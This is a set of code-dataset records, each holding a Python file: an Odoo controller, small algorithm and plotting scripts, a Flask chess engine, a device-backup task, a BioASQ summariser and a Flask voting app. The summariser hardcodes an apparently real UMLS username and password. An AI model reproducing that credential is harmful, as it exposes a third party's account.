+{"seq_id":"237037763","text":"# -*- coding: utf-8 -*-\nfrom odoo import http\nfrom odoo.http import request\n\nclass AbsolutepianoModiferPoscustomer(http.Controller):\n\n @http.route('/web/pos/client_info', auth='public', type='json',)\n def get_client_info(self, **kw):\n singapore = request.env.ref('base.sg')\n country_code = request.env['partner.country.code'].search([('country','=',singapore.id)], limit=1)\n return {\n 'country' : [singapore.id, singapore.name],\n 'country_code' : [country_code.id, country_code.name] if country_code else False,\n }\n","sub_path":"beta-dev1/absolutepiano_reusable_poscustomer/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"104019513","text":"class Solution:\n # Given two binary strings, return their sum (also a binary string).\n # Example a = 11 b = 1 Return 100\n # @param {string} a a number\n # @param {string} b a number\n # @return {string} the result\n def addBinary(self, a, b):\n # Write your code here\n if not a:\n return b\n if not b:\n return a\n if len(a) < len(b):\n s, l = a, b\n else:\n s, l = b, a\n stack = []\n result = \"\"\n for i in range(len(l) - 1, -1, -1):\n stack.append(l[i])\n for m in range(len(s) - 1, -1, -1):\n if s[m] == \"1\":\n for n in range(len(s) - 1 - m, len(stack)):\n if stack[n] == \"1\":\n stack[n] = \"0\"\n else:\n stack[n] = \"1\"\n break\n if stack[len(stack) - 1] == \"0\":\n stack.append(\"1\")\n for j in range(0, len(stack)):\n result += stack.pop()\n return result\n","sub_path":"(408) Add Binary.py","file_name":"(408) Add Binary.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596878953","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 20 12:14:42 2019\r\n@author: melingk1\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n#%matplotlib inline\r\nimport matplotlib.pyplot as plt\r\n#import matplotlib.dates as md\r\nimport datetime as dt\r\nimport time\r\nfrom datetime import datetime\r\nfrom os import scandir\r\nimport os\r\nfrom pathlib import Path\r\nimport math\r\n\r\n\r\n#function to check if csv date is in 24 hr and european style format\r\ndef formatting_check24hr_nor(input):\r\n try:\r\n time.strptime(input,'%d.%m.%Y %H:%M:%S')\r\n except:\r\n return False\r\n else:\r\n return True\r\n \r\n#function to check if csv date is in murica format\r\ndef formatting_check12hr_american(input):\r\n try:\r\n time.strptime(input,'%m/%d/%Y %I:%M:%S %p')\r\n except:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# def convert_date(timestamp):\r\n# d = datetime.utcfromtimestamp(timestamp)\r\n# formated_date = d.strftime('%d %b %Y')\r\n# return formated_date\r\n# =============================================================================\r\n#import the contents of a folder\r\n# =============================================================================\r\n# \r\n# def get_files():\r\n# dir_entries = scandir('C:/Users/Kristoffer/Desktop/python/testing')\r\n# for entry in dir_entries:\r\n# if entry.is_file():\r\n# info = entry.stat()\r\n# print(f'{entry.name}\\t Last Modified: {convert_date(info.st_mtime)}')\r\n# \r\n# =============================================================================\r\n\r\n#def parse_and_print(f_name):\r\n\r\nf_name='dPinletAandB3month.csv'\r\nindex = pd.read_csv(f_name,nrows = 0, delimiter =\" \")\r\ndf = pd.read_csv(f_name,skiprows=1 ,delimiter=\"\\t\")\r\n\r\ncol=df.columns\r\n\r\n\r\nif col.size>=3:\r\n varA=df.loc[:,col[1]]\r\n date=df.loc[:,col[0]]\r\n varB=df.loc[:,col[2]]\r\n \r\nelif col.size >= 2: \r\n varA=df.loc[:,col[1]]\r\n date=df.loc[:,col[0]]\r\n \r\nelif col.size>=1:\r\n date=df.loc[:,col[0]]\r\n \r\n#the available date formats\r\nformattAMPM = '%m/%d/%Y %I:%M:%S %p'\r\nformatt24hr = '%d.%m.%Y %H:%M:%S'\r\n\r\n#check what format the data is\r\nif formatting_check24hr_nor(date[1]):\r\n dates=[datetime.strptime(date,formatt24hr) for date in date]\r\nelif formatting_check12hr_american(date[1]):\r\n dates=[datetime.strptime(date,formattAMPM) for date in date]\r\n#if csv use comma as decimal delimiter, then this must be changed to \".\" \r\nif isinstance(varA[0],str):\r\n varA[:] = varA.replace(',','.', regex=True)\r\n varA[:]=varA.astype(float)\r\nif isinstance(varB[0],str):\r\n varB[:] = varB.replace(',','.', regex=True)\r\n varB[:]=varB.astype(float)\r\n\r\nvarA_average = varA.mean() \r\nvarB_average = varB.mean() \r\navg_diff = abs(varA_average - varB_average)\r\n\r\n#decide if both column A and B contain valid values that can be plotted\r\nif 'varB'in globals() and not math.isnan(varA[0]) and not math.isnan(varB[0]):\r\n if avg_diff > 200:\r\n fig, ax1 = plt.subplots()\r\n ax1.set_ylabel(col[1])\r\n ax1.plot(dates,varA)\r\n \r\n ax2 = ax1.twinx()\r\n ax2.set_ylabel(col[2])\r\n ax2.plot(dates,varB)\r\n #fig.thight_layout()\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)\r\n #plt.show()\r\n \r\n else:\r\n plt.ylabel(col[1]+' '+ col[2])\r\n plt.plot(dates,varA)\r\n plt.plot(dates,varB)\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)\r\n 
\r\n \r\n\r\n\r\n \r\nelif not math.isnan(varA[0]):\r\n plt.ylabel(col[1])\r\n plt.plot(dates, varA)\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)\r\nelif not math.isnan(varB[0]):\r\n plt.ylabel(col[2]) \r\n plt.plot(dates, varB)\r\n plt.xlabel('Dates')\r\n plt.xticks(rotation=45)","sub_path":"csvparser1.py","file_name":"csvparser1.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
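The two strptime probes in that script generalize naturally to a single detector over a list of candidate formats; the list below starts with the same two formats the script already supports, so adding a third format becomes a one-line change:

import time

DATE_FORMATS = ['%d.%m.%Y %H:%M:%S', '%m/%d/%Y %I:%M:%S %p']

def detect_format(sample):
    """Return the first matching strptime format string, or None."""
    for fmt in DATE_FORMATS:
        try:
            time.strptime(sample, fmt)
            return fmt
        except ValueError:
            continue
    return None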
+{"seq_id":"70135725","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n 案例:利用NumPy实现梯度下降算法预测疾病\r\n 任务:根据体重指数(BMI)和疾病发展的定量测量值(Y)使用梯度下降算法拟合出一条直线 y_hat = aX+b\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\n\r\ndata_path = './data/diabetes.csv'\r\n\r\n\r\ndef load_data(data_file):\r\n \"\"\"\r\n 功能:读取数据文件,加载数据\r\n 参数:\r\n - data_file:文件路径\r\n 返回:\r\n - data_arr:数据的多维数组表示\r\n \"\"\"\r\n data_arr = np.loadtxt(data_file, delimiter=',', skiprows=1)\r\n return data_arr\r\n\r\n\r\ndef normalization(x, a, b):\r\n \"\"\"\r\n 对数据进行归一化操作\r\n \"\"\"\r\n x = (x - b) / (a - b)\r\n return x\r\n\r\n\r\ndef get_gradient(theta, x, y):\r\n m = x.shape[0]\r\n y_estimate = x.dot(theta)\r\n error = y_estimate - y\r\n grad = 1.0/m * error.dot(x)\r\n cost = 1.0/(2 * m) * np.sum(error ** 2)\r\n return grad, cost\r\n\r\n\r\ndef gradient_descent(x, y, max_iter=1500, alpha=0.1):\r\n theta = np.random.randn(2)\r\n\r\n # 收敛阈值\r\n tolerance = 1e-6\r\n\r\n # 计数器\r\n iterations = 1\r\n\r\n is_converged = False\r\n while not is_converged:\r\n grad, cost = get_gradient(theta, x, y)\r\n new_theta = theta - alpha * grad\r\n\r\n # Print cost\r\n print('第{}次迭代,损失值 {:.4f}'.format(iterations, cost))\r\n\r\n # Stopping Condition\r\n if np.sum(abs(new_theta - theta)) < tolerance:\r\n is_converged = True\r\n print('参数收敛!!!')\r\n print('theta的值为:{}'.format(theta))\r\n\r\n if iterations >= max_iter:\r\n is_converged = True\r\n print('已至最大迭代次数{}'.format(max_iter))\r\n print('theta的值为:{}'.format(theta))\r\n\r\n iterations += 1\r\n theta = new_theta\r\n\r\n return theta\r\n\r\n\r\ndef show(x1, theta, y):\r\n # 绘制结果\r\n y_pred = theta[0] + theta[1] * x1[:, 1]\r\n plt.figure()\r\n\r\n # 绘制样本点\r\n plt.scatter(x1[:, 1], y)\r\n\r\n # 绘制拟合线\r\n plt.plot(x1[:, 1], y_pred, c='red')\r\n plt.show()\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 主函数\r\n \"\"\"\r\n data_arr = load_data(data_path)\r\n x = data_arr[:, 0].reshape(-1, 1)\r\n x = normalization(x, np.max(x), np.min(x))\r\n y = data_arr[:, 1]\r\n y = normalization(y, np.max(y), np.min(y))\r\n x1 = np.hstack((np.ones_like(x), x))\r\n theta = gradient_descent(x1, y, alpha=0.1, max_iter=10000)\r\n show(x1, theta, y)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"145847524","text":"from flask import Flask, Response, request\nimport os\nimport chess\nimport time\nimport chess.svg\nimport traceback\nimport base64\nfrom state import State\nimport torch\nfrom train import Net\n\nMAXVAL = 10000\n\n# Valuator class that uses nn to evalueate the board\n\n\nclass Valuator(object):\n def __init__(self):\n\n vals = torch.load(\"nets/value1M.pth\", map_location=lambda storage, loc: storage)\n self.model = Net()\n self.model.load_state_dict(vals)\n\n def __call__(self, bState):\n brd = bState.serialize()[None]\n output = self.model(torch.tensor(brd).float())\n return float(output.data[0][0])\n\n\n# chess board, \"engine\" and flask app\ns = State()\nv = Valuator()\napp = Flask(__name__)\n\ndef computer_minimax(s, v, depth, a, b, big=False):\n if depth >= 3 or s.board.is_game_over():\n return v(s)\n\n # white is maximizing player\n turn = s.board.turn\n if turn == chess.WHITE:\n ret = -MAXVAL\n else:\n ret = MAXVAL\n\n if big:\n bret = []\n\n # can prune here with beam search\n isort = []\n for e in s.board.legal_moves:\n s.board.push(e)\n isort.append((v(s), e))\n s.board.pop()\n move = sorted(isort, key=lambda x: x[0], reverse=s.board.turn)\n # beam search beyond depth 3\n if depth >= 3:\n move = move[:10]\n\n for e in [x[1] for x in move]:\n s.board.push(e)\n tval = computer_minimax(s, v, depth+1, a, b)\n s.board.pop()\n if big:\n bret.append((tval, e))\n if turn == chess.WHITE:\n ret = max(ret, tval)\n a = max(a, ret)\n if a >= b:\n break # b cut-off\n else:\n ret = min(ret, tval)\n b = min(b, ret)\n if a >= b:\n break # a cut-off\n if big:\n return ret, bret\n else:\n return ret\n\n\ndef explore_leaves(s, v):\n ret = []\n start = time.time()\n begining_eval = v(s)\n print(\"Human move Eval: \", begining_eval, flush=True)\n cval, ret = computer_minimax(s, v, 0, a=-MAXVAL, b=MAXVAL, big=True)\n eta = time.time() - start\n print(\"%.2f -> %.2f: explored in %.3f seconds\" % (begining_eval, cval, eta), flush=True)\n return ret\n\n\n# def to_svg(s):\n# return base64.b64encode(chess.svg.board(board=s.board).encode('utf-8')).decode('utf-8')\n\n@app.route(\"/\")\ndef hello():\n print(\"get /\", flush=True)\n ret = open(\"index.html\").read()\n return ret.replace('start', s.board.fen())\n\n\ndef computer_move(s, v):\n # computer moves\n moves = sorted(explore_leaves(s, v), key=lambda x: x[0], reverse=s.board.turn)\n if len(moves) == 0:\n return\n print(\"top 3:\", flush=True)\n print(moves, flush=True)\n for i, m in enumerate(moves[0:3]):\n print(\" \", m, flush=True)\n print(s.board.turn, \"moving\", moves[0][1], flush=True)\n s.board.push(moves[0][1])\n\n# moves given as coordinates of piece moved\n\n\n@app.route(\"/move_coordinates\")\ndef move_coordinates():\n if not s.board.is_game_over():\n source = int(request.args.get('from', default=''))\n target = int(request.args.get('to', default=''))\n promotion = True if request.args.get('promotion', default='') == 'true' else False\n\n move = s.board.san(chess.Move(source, target, promotion=chess.QUEEN if promotion else None))\n move_check = chess.Move(source, target, promotion=chess.QUEEN if promotion else None)\n\n # Checking if player move is legal\n if move_check not in s.board.legal_moves:\n print(\"illegal move\", flush=True)\n response = app.response_class(response=s.board.fen(), status=0)\n return response\n\n # If move is legal AI makes its move\n if move is not None and move != \"\":\n print(\"human moves\", move, flush=True)\n try:\n s.board.push_san(move)\n computer_move(s, v)\n except 
Exception:\n traceback.print_exc()\n\n response = app.response_class(response=s.board.fen(), status=200)\n return response\n\n print(\"GAME IS OVER\")\n response = app.response_class(\n response=\"game over\",\n status=200\n )\n return response\n\n\n@app.route(\"/newgame\")\ndef newgame():\n print(\"Game was reset!\", flush=True)\n s.board.reset()\n response = app.response_class(\n response=s.board.fen(),\n status=200\n )\n return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
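A rough interactive usage sketch for the pieces above, assuming State wraps a python-chess Board in s.board (which is how this file uses it) and that nets/value1M.pth exists:

s = State()
v = Valuator()
print(v(s))  # static evaluation of the current position
value, scored_moves = computer_minimax(s, v, 0, a=-MAXVAL, b=MAXVAL, big=True)
best = sorted(scored_moves, key=lambda x: x[0], reverse=s.board.turn)[0]
print(value, best)  # search value and the best (score, move) pair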
+{"seq_id":"168138158","text":"\n\n\nimport os\nimport typing\n\nimport jk_pathpatternmatcher2\nimport jk_utils\nfrom jk_typing import checkFunctionSignature\nimport jk_mounting\n\nfrom ..ThaniyaBackupContext import ThaniyaBackupContext\nfrom ..ThaniyaIO import ThaniyaIO\nfrom ..tools.EnumTarPathMode import EnumTarPathMode\nfrom ..tools.ThaniyaTar import ThaniyaTar\n\nfrom .AbstractThaniyaTask import AbstractThaniyaTask\n\n\n\n\n\n\n#\n# This class performs a backup of a Linux/UNIX block device.\n#\nclass TBackupDevice(AbstractThaniyaTask):\n\n\t################################################################################################################################\n\t## Constructor\n\t################################################################################################################################\n\n\t@checkFunctionSignature()\n\tdef __init__(self, devicePath:str, targetFileName:typing.Union[str,None] = None, ensureNotMounted:bool = False):\n\t\tassert devicePath\n\t\tassert os.path.exists(devicePath)\n\t\tassert os.path.isabs(devicePath)\n\t\tassert devicePath.startswith(\"/dev/\")\n\n\t\tassert isinstance(ensureNotMounted, bool)\n\t\tself.__ensureNotMounted = ensureNotMounted\n\n\t\tif targetFileName is not None:\n\t\t\tassert targetFileName\n\n\t\tself.__devicePath = devicePath\n\n\t\tif targetFileName:\n\t\t\tself.__targetFileName = targetFileName\n\t\telse:\n\t\t\tself.__targetFileName = devicePath.replace(\"/\", \"-\")\n\t\t\tif self.__targetFileName.startswith(\"-\"):\n\t\t\t\tself.__targetFileName = self.__targetFileName[1:]\n\t\t\tself.__targetFileName = \"device--\" + self.__targetFileName + \".rawdev\"\n\t#\n\n\t################################################################################################################################\n\t## Public Properties\n\t################################################################################################################################\n\n\t@property\n\tdef logMessageCalculateSpaceRequired(self) -> str:\n\t\treturn \"Determining backup size of device: \" + repr(self.__devicePath)\n\t#\n\n\t@property\n\tdef logMessagePerformBackup(self) -> str:\n\t\treturn \"Performing backup of device: \" + repr(self.__devicePath)\n\t#\n\n\t################################################################################################################################\n\t## Helper Methods\n\t################################################################################################################################\n\n\t################################################################################################################################\n\t## Public Methods\n\t################################################################################################################################\n\n\tdef calculateSpaceRequired(self, ctx:ThaniyaBackupContext) -> int:\n\t\tnSize = ThaniyaIO.getSizeOfDevice(ctx, self.__devicePath)\n\t\tctx.log.info(\"I/O expected: \" + jk_utils.formatBytes(nSize))\n\t\treturn nSize\n\t#\n\n\tdef performBackup(self, ctx:ThaniyaBackupContext):\n\t\tif self.__ensureNotMounted:\n\t\t\tmi = jk_mounting.Mounter().getMountInfoByFilePath(self.__devicePath)\n\t\t\tif mi is not None:\n\t\t\t\traise Exception(\"The device is still mounted: \" + 
repr(self.__devicePath))\n\n\t\tThaniyaIO.copyDevice(\n\t\t\tctx=ctx,\n\t\t\tsourceDevicePath=self.__devicePath,\n\t\t\ttargetFileOrDirectoryPath=ctx.absPath(self.__targetFileName),\n\t\t\t)\n\t#\n\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"thaniya_client/src/thaniya_client/tasks/TBackupDevice.py","file_name":"TBackupDevice.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"78561323","text":"from flask import Flask, request, render_template\nimport sys\nimport json\nimport csv\nimport sys\nimport os\nimport itertools\nimport numpy as np\nimport operator\nimport types\nimport cPickle as pickle\nimport pickle\nfrom nltk.tokenize import sent_tokenize\nimport re\nimport lucene\nfrom sklearn.cluster import AgglomerativeClustering\nfrom java.nio.file import Paths\n#from org.apache.lucene.analysis.en import EnglishAnalyzer\nfrom org.apache.lucene.analysis.standard import StandardAnalyzer\nfrom org.apache.lucene.document import Document, Field\nfrom org.apache.lucene.search import IndexSearcher, LegacyNumericRangeQuery\nfrom org.apache.lucene.index import MultiReader\nfrom org.apache.lucene.index import IndexReader, DirectoryReader\nfrom org.apache.lucene.queryparser.classic import QueryParser\nfrom org.apache.lucene.store import SimpleFSDirectory\nfrom org.apache.lucene.util import Version\n\nfrom pymedtermino import *\nfrom pymedtermino.snomedct import *\nfrom pymedtermino.umls import *\nfrom pymetamap import MetaMap\n\nfrom Authentication import *\nimport requests\nimport json\nfrom random import randint\n\n#############################################\n\nglobal gen_dir, cache, cuilist, username, password, version, AuthClient, tgt, uri\ngen_dir = \"generatedSummaries\"\n\ncache = {} #{cui:jsonData}\ncuilist=[]\n\n#umls authentication\nusername = \"khyathi\"\npassword = \"Oaqa12#$\"\n#apikey = args.apikey\nversion = \"2016AB\"\n#identifier = args.identifier\n#source = args.source\nAuthClient = Authentication(username,password)\n\n#get TGT for our session\ntgt = AuthClient.gettgt()\nuri = \"https://uts-ws.nlm.nih.gov\"\n\n#initializing lucene parameters\nlucene.initVM()\nanalyzer = StandardAnalyzer()\nreader_first = DirectoryReader.open(SimpleFSDirectory(Paths.get(\"/home/khyathi/Projects/bioasq/medline17n-lucene1/\")))\nsearcher = IndexSearcher(reader_first)\n\n\n#############################################\n\napp = Flask(__name__)\n\n@app.route('/initializeGlobalVariables')\ndef initializeGlobalVariables():\n\tgen_dir = \"generatedSummaries\"\n\ndef similarity(question, sentence):\n\toriginalQuestion = question[0]\n\texpandedQuestion = question[1]\n\toriginalSentence = sentence[0]\n\texpandedSentence = sentence[1]\n\toriginalSimilarity = len(list(set(originalQuestion).intersection(originalSentence)))\n\texpandedSimilarity = len(list(set(expandedQuestion).intersection(expandedSentence)))\n\tsimilarityScore = originalSimilarity + (0.5*expandedSimilarity)\n\t#return similarityScore\n\tquestion1 = question[0] + question[1]\n\tsentence1 = sentence[0] + sentence[1]\n\t#similarity with word2vec tools\n\treturn len(list(set(question1).intersection(sentence1)))\n\n\ndef cluster(sentenceScoreDict,csumm):\n allSents = []\n totalScore = 0\n for key,value in sentenceScoreDict.iteritems():\n totalScore += value\n if len(sentenceScoreDict)!=0:\n avgScore = float(totalScore)/float(len(sentenceScoreDict))\n else:\n avgScore = float(totalScore)\n for key,value in sentenceScoreDict.iteritems():\n if value > avgScore:\n allSents.append(key)\n #allSents = [\"ac is my\", \"this is apple\", \"apple and bottle\", \"and\"]\n sentencePairs = list(itertools.combinations(allSents,2))\n num_clusters=5\n if len(allSents) < 10:\n f = open(gen_dir+\"bioasq.\"+str(csumm)+\".txt\",'w')\n for sent in allSents:\n f.write(sent+\"\\n\")\n f.close()\n return\n model = AgglomerativeClustering(n_clusters=num_clusters, affinity='precomputed', connectivity=None, linkage='average', 
compute_full_tree='auto')\n X = np.zeros((len(allSents), len(allSents)))\n for i in range( len(sentencePairs) ):\n index1 = allSents.index(sentencePairs[i][0])\n index2 = allSents.index(sentencePairs[i][1])\n distance = 1- similarity( sentencePairs[i][0].split(), sentencePairs[i][1].split() )\n if index1 <= index2:\n X[index1, index2] = distance\n else:\n X[index2, index1] = distance\n class_labels = model.fit_predict(X)\n selectedSents = {}\n for i in range(len(allSents)):\n curClass = class_labels[i]\n curSent = allSents[i]\n if curClass in selectedSents:\n curScore = sentenceScoreDict[curSent]\n if curScore > selectedSents[curClass][1]:\n selectedSents[curClass] = ( curSent , sentenceScoreDict[curSent] )\n else:\n selectedSents[curClass] = ( curSent , sentenceScoreDict[curSent] ) \n score = sentenceScoreDict[curSent]\n #print \"OUR SUMMMAAARRRRRRRRRRRRRRRRYYYYYYYYYYYYYYYYYYYYYYYY\"\n newselectedSents = {}\n for key,value in selectedSents.iteritems():\n newselectedSents[value[0]] = value[1]\n #print newselectedSents\n sorted_ss = sorted(newselectedSents.items(), key=operator.itemgetter(1), reverse=True)\n sumLen=0\n #f = open(gen_dir+\"bioasq.\"+str(csumm)+\".txt\",'w')\n summaryFinal = \"\"\n for pair in sorted_ss:\n summarySentence = pair[0]\n sumLen += len(summarySentence.split())\n if sumLen<=200:\n #f.write(summarySentence+\"\\n\")\n summaryFinal += summarySentence\n #f.close()\n return summaryFinal\n #print selectedSents\n #exit(1)\n\n#@app.route('/readData', methods=['GET', 'POST'])\ndef readData(NoExpansionFlag, UmlsExpansionFlag):\n\t#instantiating metamap\n\tmm = MetaMap.get_instance('/home/khyathi/installations/public_mm/bin/metamap')\n\tstart_command = \"/home/khyathi/installations/public_mm/bin/skrmedpostctl start\"\n\tos.system(start_command)\n\trandomNumber = randint(0, 100)\n\tcsumm=0\n\tinfile = open(sys.argv[1],'r')\n\tdata = json.load(infile)\n\t#c=1\n\tfor (i, question) in enumerate(data['questions']):\n\t\tif question['type'] == 'summary':\n\t\t\tcsumm +=1\n\t\tif csumm != randomNumber:\n\t\t\tcontinue\n\t\t#if csumm >=3:\n\t\t#\tbreak\n\t\tquest = unicode(question['body']).encode(\"ascii\",\"ignore\")\n\t\tquestionBow = quest.split()\n\t\texpandedQuestion = [questionBow] + [[]]\n\t\tif NoExpansionFlag == True:\n\t\t\texpandedQuestion = [questionBow] + [[]]\n\t\telif UmlsExpansionFlag == True:\n\t\t\texpandedQuestion = [questionBow] + [expandConcepts(quest)]\n\t\t#print expandedQuestion\n\t\t#raw_input()\n\t\tideal_summaries = question[\"ideal_answer\"]\n\t\tideal_answer_sents = []\n\t\tif isinstance(ideal_summaries, types.StringTypes):\n\t\t\tideal_answer_sents = sent_tokenize(ideal_summaries)\n\t\telse:\n\t\t\tideal_answer_sents = sent_tokenize(ideal_summaries[0])\n\t\t\"\"\"\n\t\tout = open(\"./ideal_summaries1/bioasq.\"+str(csumm)+\".txt\", \"w\")\n\t\tfor sentence in ideal_answer_sents:\n\t\t\tout.write(unicode(sentence).encode(\"ascii\",\"ignore\")+\"\\n\")\n\t\tout.close()\n\t\t\"\"\"\n\t\tsnippets = question['snippets']\n\t\t#documents = question['documents']\n\t\tsentences = []\n\t\tsentenceScoreDict = {}\n\t\tsnippetsText = []\n\t\tfor snippet in question['snippets']:\n\t\t\ttext = unicode(snippet[\"text\"]).encode(\"ascii\", \"ignore\")\n\t\t\tsnippetsText.append(text)\n\t\t\tif text == \"\":\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tsentences += sent_tokenize(text)\n\t\t\texcept:\n\t\t\t\tsentences += text.split(\". 
\")\n\t\t\t#print sentences\n\t\t\t#exit(1)\n\t\t\t#for document in question['documents']:\n\t\t\t#print document\n\t\t\t#abstractText = unicode( retrieve(document) ).encode(\"ascii\",\"ignore\")\n\t\t\t#if abstractText == \"\":\n\t\t\t# continue\n\t\t\t#try:\n\t\t\t# sentences += sent_tokenize(abstractText)\n\t\t\t#except:\n\t\t\t# sentences += abstractText.split(\". \")\n\t\tfor sentence in sentences:\n\t\t\tsentenceBow = sentence.split()\n\t\t\texpandedSentence = [sentenceBow] + [[]]\n\t\t\tif NoExpansionFlag == True:\n\t\t\t\texpandedSentence = [sentenceBow] + [[]]\n\t\t\telif UmlsExpansionFlag == True:\n\t\t\t\texpandedSentence = [sentenceBow] + [expandConcepts(sentence)]\n\t\t\tsimilarityScore = similarity(expandedQuestion, expandedSentence)\n\t\t\tsentenceScoreDict[sentence] = similarityScore \n\t\tsummaryFinal = cluster(sentenceScoreDict,csumm)\n\t\t#print \"generated summary \" + str(csumm)\n\t\t#question = \"When does the antipeptic action of bisabolol occur with a pH-value?\"\n\t\tpickle.dump(cache, open(\"cached_umls_json.pkl\",\"wb\"))\n\t\tpickle.dump(cuilist, open(\"cui.pkl\",\"wb\"))\n\t\tstop_command = \"/home/khyathi/installations/public_mm/bin/skrmedpostctl stop\"\n\t\t#stop_command = \"~/public_mm/bin/skrmedpostctl stop\"\n\t\tos.system(stop_command)\n\t\t#exit(1)\n\t\treturn (quest, snippetsText, summaryFinal)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\tinitializeGlobalVariables()\n\tUmlsExpansionFlag = False\n\tNoExpansionFlag = False\n\t#if UmlsExpansionFlag == False and NoExpansionFlag==False:\n\t#\treturn (\"\",\"\",\"\")\n\tif request.method == 'POST':\n\t\tif request.form['submit'] == 'UMLS Expansion':\n\t\t\tUmlsExpansionFlag = True\n\t\telif request.form['submit'] == 'No Expansion':\n\t\t\tNoExpansionFlag = True\n\tquestion, snippets, summaryFinal = readData(NoExpansionFlag, UmlsExpansionFlag)\n\treturn render_template(\"bioasq.html\", question = question, snippets = snippets, summaryFinal = summaryFinal)\n\t#return 'Welcome to the homepage of bioasq'\n\n@app.route('/load', methods=['GET', 'POST'])\ndef load():\n\treturn 'This is the image'\n\nif __name__ == \"__main__\":\n\tapp.run(debug = True)","sub_path":"webservice/safebasic2.py","file_name":"safebasic2.py","file_ext":"py","file_size_in_byte":8665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"52648810","text":"from datetime import datetime\r\n\r\nimport sqlalchemy\r\nfrom flask import render_template, request, Response\r\n\r\nfrom app import app, db, logger\r\n\r\n\r\n@app.before_first_request\r\ndef create_tables():\r\n # Create tables (if they don't already exist)\r\n with db.connect() as conn:\r\n conn.execute(\r\n \"CREATE TABLE IF NOT EXISTS votes \"\r\n \"( vote_id SERIAL NOT NULL, time_cast timestamp NOT NULL, \"\r\n \"candidate CHAR(6) NOT NULL, PRIMARY KEY (vote_id) );\"\r\n )\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef index():\r\n votes = []\r\n with db.connect() as conn:\r\n # Execute the query and fetch all results\r\n recent_votes = conn.execute(\r\n \"SELECT candidate, time_cast FROM votes \" \"ORDER BY time_cast DESC LIMIT 5\"\r\n ).fetchall()\r\n # Convert the results into a list of dicts representing votes\r\n for row in recent_votes:\r\n votes.append({\"candidate\": row[0], \"time_cast\": row[1]})\r\n\r\n stmt = sqlalchemy.text(\r\n \"SELECT COUNT(vote_id) FROM votes WHERE candidate=:candidate\"\r\n )\r\n # Count number of votes for tabs\r\n tab_result = conn.execute(stmt, candidate=\"TABS\").fetchone()\r\n tab_count = tab_result[0]\r\n # Count number of votes for spaces\r\n space_result = conn.execute(stmt, candidate=\"SPACES\").fetchone()\r\n space_count = space_result[0]\r\n\r\n return render_template(\r\n \"index.html\", recent_votes=votes, tab_count=tab_count, space_count=space_count\r\n )\r\n\r\n\r\n@app.route(\"/\", methods=[\"POST\"])\r\ndef save_vote():\r\n # Get the team and time the vote was cast.\r\n team = request.form[\"team\"]\r\n time_cast = datetime.datetime.utcnow()\r\n # Verify that the team is one of the allowed options\r\n if team != \"TABS\" and team != \"SPACES\":\r\n logger.warning(team)\r\n return Response(response=\"Invalid team specified.\", status=400)\r\n\r\n stmt = sqlalchemy.text(\r\n \"INSERT INTO votes (time_cast, candidate)\" \" VALUES (:time_cast, :candidate)\"\r\n )\r\n try:\r\n with db.connect() as conn:\r\n conn.execute(stmt, time_cast=time_cast, candidate=team)\r\n except Exception as e:\r\n logger.exception(e)\r\n return Response(\r\n status=500,\r\n response=\"Unable to successfully cast vote! Please check the \"\r\n \"application logs for more details.\",\r\n )\r\n\r\n return Response(\r\n status=200,\r\n response=\"Vote successfully cast for '{}' at time {}!\".format(team, time_cast),\r\n )\r\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
